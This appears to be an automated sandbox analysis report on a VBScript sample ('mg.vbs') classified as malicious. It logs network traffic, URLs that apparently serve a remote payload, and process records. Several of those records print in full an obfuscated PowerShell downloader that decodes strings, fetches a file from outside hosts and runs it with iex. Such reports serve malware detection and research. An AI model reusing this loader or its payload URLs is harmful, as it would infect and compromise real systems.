      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:42:33 GMT | server: LiteSpeed
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:42:40 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:42:45 GMT | server: LiteSpeed
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:42:51 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:42:57 GMT | server: LiteSpeed
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:43:03 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:43:09 GMT | server: LiteSpeed
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:43:15 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:43:20 GMT | server: LiteSpeed
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:43:26 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:43:32 GMT | server: LiteSpeed
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:43:38 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:43:44 GMT | server: LiteSpeed
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:43:50 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BC4A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC3D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC668000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BCAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB5AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC06D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBD2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://almrwad.com
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BC5FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB4CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBFB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBC59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://erp-royal-crown.info
      Source: powershell.exe, 00000001.00000002.3000440542.00000273CAE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BAC81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BC4A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC3D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC668000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BCAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB5AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC06D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBD2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.almrwad.com
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BC5FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB4CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBFB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBC59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.erp-royal-crown.info
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BAC81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000001.00000002.3000440542.00000273CAE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC06D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC6BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBD10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.smi
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BC1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC5EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBFB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBC59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.smiX
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
      Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
      Source: unknownHTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.4:49732 version: TLS 1.2

      System Summary

Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object | HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B834F34
Source: mg.vbs | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 8173
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 8173
Source: classification engine | Classification label: mal100.expl.evad.winVBS@6/3@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Succesfulde.blo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kj1qlplk.h1d.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: mg.vbs | ReversingLabs: Detection: 34%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh 